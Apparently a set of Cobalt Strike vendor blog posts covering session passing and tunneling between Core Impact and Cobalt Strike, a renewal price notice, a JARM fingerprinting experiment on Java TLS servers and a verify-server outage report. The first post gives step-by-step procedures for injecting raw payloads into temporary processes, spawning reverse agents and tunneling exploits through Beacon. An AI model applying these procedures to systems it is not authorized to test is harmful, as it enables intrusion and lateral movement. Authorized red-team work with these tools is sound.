Session Passing from Core Impact to Cobalt Strike

One of the most important forms of tool interoperability is the ability to pass sessions between platforms.

Core Impact 20.3 includes a Run shellcode in temporary process module to support session passing. This module spawns a temporary process and injects the contents of the specified file into it. The module does support spawning code x86 -> x86, x64 -> x64, and x64 -> x86.

To pass a session from Core Impact to Cobalt Strike:

[Cobalt Strike]

1. Go to Attacks -> Packages -> Windows EXE (S)
2. Press … to choose your listener
3. Change Output to raw
4. Check x64 if you wish to export an x64 payload.
5. Press Generate and save the file

[Core Impact]

1. Right-click on the desired agent and click Set as Source
2. Find the Run shellcode in temporary process module and double-click it.
3. Set ARCHITECTURE to x86-64 if you exported an x64 payload
4. Set FILENAME to the file generated by Cobalt Strike
5. Press OK

This pattern is a great way to spawn Cobalt Strike’s Beacon after a successful remote or privilege escalation exploit with Core Impact.

Session Passing from Cobalt Strike to Core Impact

You can also spawn a Core Impact agent from Cobalt Strike too. If Core Impact and Cobalt Strike can reach the same network, this pattern is a light way to turn an access obtained with Beacon (e.g., via phishing, lateral movement, etc.) into an Impact agent.

[Core Impact]

1. Find the Package and Register Agent module and double-click it.
2. Change ARCHITECTURE to x86-64 if you’d like to export an x64 agent
3. Change BINARY TYPE to raw
4. Change TARGET FILE to where you would like to save the file
5. Expand Agent Connection
6. Change CONNECTION METHOD and PORT to fit your preference. I find the Connect from target (reverse TCP connection) is the most performant.

[Cobalt Strike]

1. Interact with a Beacon
2. Type shspawn x64 if you exported an x64 agent. Type shspawn x86 if you exported an x86 agent.
3. Find the file that you exported.
4. Press Open.

In a few moments, you should hear that famous New Agent Deployed wav.

Tunnel Core Impact exploits through Cobalt Strike

Core Impact has an interesting offensive model. Its exploits and scans do not originate from your Core Impact GUI. The entire framework is architected to delegate offense activity through a source agent. The currently selected source agent also acts as a controller to receive connections from reverse agents [or to connect to and establish control of bind agents]. In this model, the offense process is: start with local agent, find and exploit target, set new agent as source agent, find and exploit newly visible targets, repeat until satisfied.

As the agent is the main offense actor in Core Impact, tunneling Core Impact exploits is best accomplished by tunneling the Core Impact agent through Cobalt Strike’s Beacon.

Cobalt Strike 4.2 introduced the spunnel command to spawn Core Impact’s Windows agent in a temporary process and create a localhost-only reverse port forward for it. Here are the steps to tunnel Core Impact’s agent with spunnel:

[Core Impact]

1. Click the Modules tab in the Core Impact user interface
2. Search for Package and Register Agent
3. Double-click this module
4. Change Platform to Windows
5. Change Architecture to x86-64
6. Change Binary Type to raw
7. Click Target File and press … to decide where to save the output.
8. Go to Agent Connection
9. Change Connection Method to Connect from Target
10. Change Connect Back Hostname to 127.0.0.1
11. Change Port to some value (e.g., 9000) and remember it.
12. Press OK.

[Cobalt Strike]

1. Interact with a Beacon
2. Type spunnel x64 [impact IP address] 9000 and press enter.
3. Find the file that you exported.
4. Press Open.

This similar to passing a session from Cobalt Strike to Core Impact. The difference here is the Impact agent’s traffic is tunneled through Cobalt Strike’s Beacon payload.

What happens when Cobalt Strike’s team server is on the internet and Core Impact is on a local Windows virtual machine? We have a pattern for this too. Run a Cobalt Strike client from the same Windows system that Core Impact is installed onto. Connect this Cobalt Strike client to your team server. In this setup, run spunnel_local x64 127.0.0.1 9000 to spawn and tunnel the Impact agent through Beacon. The spunnel_local command is like spunnel, with the difference that it routes the agent traffic from Beacon to the team server and onwards through your Cobalt Strike client. The spunnel_local command was designed for this exact situation.

Next step: Request a trial

The above options are our patterns for interoperability between Core Impact and Cobalt Strike.

If you have Cobalt Strike and would like to try these patterns with Core Impact, we recommend that you request a trial of Core Impact and try it out.

2021 Cobalt Strike Renewal COLA Price Increase

At HelpSystems we are committed to investing in continuous improvement by enhancing existing solutions, developing new technologies, and retaining the best employees. Maintenance and subscription fees for your HelpSystems software licenses provide access to regular software updates, our world-class technical support, and other entitlements as applicable. In order to maintain the highest standards, an annual maintenance and subscription increase is in place. Annual increases are primarily the result of inflationary pressures associated with rises in employee costs and other external factors. These anticipated annual increases make it easier for customers to budget for their annual maintenance and subscription. Price increases will be assessed on an annual basis.

On January 1, 2021 we will raise the price of Cobalt Strike renewals by 3.4%. This renewal price increase applies to quotes issued on and after January 1, 2021. For example: A $2,500 one user/one year standard license renewal will cost $2,585 (+ tax) in 2021.

A Red Teamer Plays with JARM

I spent a little time looking into Saleforce’s JARM tool released in November. JARM is an active tool to probe the TLS/SSL stack of a listening internet application and generate a hash that’s unique to that specific TLS/SSL stack.

One of the initial JARM fingerprints of interest relates to Cobalt Strike. The value associated with Cobalt Strike is:

07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1

To generate a JARM fingerprint for an application, use the JARM python tool:

python3 jarm.py [target] -p [port]

I opted to dig into this, because I wanted to get a sense of whether the fingerprint is Cobalt Strike or Java.

Cobalt Strike’s JARM Fingerprint is Java’s JARM Fingerprint

I started my work with a hypothesis: Cobalt Strike’s JARM fingerprint is Java’s JARM fingerprint. To validate this, I created a simple Java SSL server application (listens on port 1234) in Sleep.

import javax.net.*;
import javax.net.ssl.*;

$factory = [SSLServerSocketFactory getDefault];
$server  = [$factory createServerSocket: 1234];
[$server setSoTimeout: 0];

if (checkError($error)) {
	warn($error);
}

while (true) {
	$socket = [$server accept];	
	[$socket startHandshake];
	[$socket close];
}

I ran this server from Java 11 with:

java -jar sleep.jar server.sl

I assessed its JARM fingerprint as:

00000000000000000042d41d00041d7a6ef1dc1a653e7ae663e0a2214cc4d9

Interesting! This fingerprint does not match the supposed Cobalt Strike fingerprint. Does this mean we’re done? No.

The current popular use of JARM is to fingerprint web server applications listening on port 443. This implies that these servers have a certificate associated with their TLS communications. Does this change the above JARM fingerprint? Let’s setup an experiment to find out.

I generated a Java keystore with a self-signed certificate and I directed my simple server to use it:

keytool -keystore ./exp.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -dname “CN=,OU=,O=,L=,S=,C=”
java -Djavax.net.ssl.keyStore=./exp.store -Djavax.net.ssl.keyStorePassword=123456 -jar sleep.jar server.sl

The JARM result:

07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1

Interesting. We’ve validated that the above JARM fingerprint is specific to a Java 11 TLS stack.

Another question: is the JARM fingerprint affected by Java version? I setup several experiments and validated that yes, different major Java versions have different JARM fingerprints in the above circumstance.

How many Java-native Web servers are on the internet?

Part of the value of JARM is to turn the internet haystack into something smaller for an analyst to sift through. I wanted to get a sense of how much Java is on the internet. Fortunately, this analysis was easy thanks to some timely and available data. Silas Cutler had scanned the internet for port 443 and obtained JARM values for each of these hosts. This data was made available as an SQLite database too. Counting through this data was a relatively easy exercise of:

sqlite> .open jarm.sqlite
sqlite> select COUNT(ip) FROM jarm WHERE hash = “[hash here]”;

Here’s what I found digging through this data:

Application Count JARM Hash
Java 1.8.0 21,099 07d14d16d21d21d07c07d14d07d21d9b2f5869a6985368a9dec764186a9175
Java 1.9.0 9 05d14d16d04d04d05c05d14d05d04d4606ef7946105f20b303b9a05200e829
Java 11.05 2,957 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1
Java 13.01 0 2ad2ad16d2ad2ad22c42d42d00042d58c7162162b6a603d3d90a2b76865b53

I went a slight step further with this data. I opted to convert the Java 11.05 data to hostnames and eyeball what appeared as interesting. I found several mail servers. I did not investigate which application they are. I found an instance of Burp Intruder (corroborating Salesforce’s blog post). I also found several instances of Oracle Peoplesoft as well. These JARM hashes are a fingerprint for Java applications, in general.

Closing Thoughts

For defenders, I wouldn’t act on a JARM value as proof of application identity alone. For red teamers, this is a good reminder to think about pro-active identification of command and control servers. This is a commoditized threat intelligence practice. If your blue team uses this type of information, there are a lot of options to protect your infrastructure. Part 3 of Red Team Operations with Cobalt Strike covers this topic starting at 1h 26m 15s:

JARM is a pretty cool way to probe a server and learn more about what it’s running. I’d love to see a database of JARM hashes and which applications they map to as a reconaissance tool. The C2 fingerprinting is a neat application of JARM too. It’s a good reminder to keep up on your infrastructure OPSEC.

verify.cobaltstrike.com outage summary

Cobalt Strike’s update process was degraded due to a data center outage that affected https://verify.cobaltstrike.com. The verify server is back up and the functionality of our update process is restored.

Here’s the timeline of the incident:

November 10, 2020 – 5:15pm EST The Cobalt Strike update process is degraded. You may still download and update the product. The verification step is unavailable. You will see a warning about verify.cobaltstrike.com not accepting connections during the update process. There is a data center networking issue that impacted our verification server. We are working with our service provider and monitoring the issue.

November 10, 2020 – 9:35pm EST The data center network issue was a planned power outage gone awry. We will bring the verify server online once connectivity is restored.

November 11, 2020 12:20pm EST The power outage caused a hardware failure with our provider. Our provider is working to address this. We have the option to migrate verify elsewhere, but are waiting out the restoration of the current server at this time.

November 11, 2020 1:05pm EST The verify server is back online and this incident is resolved.

What is the verify server?

The verify server is where we publish SHA-256 hashes of the Cobalt Strike product and its distribution packages. Our update program pins the certificate of this server and uses its hashes to verify the integrity of the product download. When the update program is unable to complete this process, it gives you the option to continue, but it warns that you should not.

The verify server exists on infrastructure separate from other parts of the Cobalt Strike update process. This outage did not affect other parts of our update infrastructure.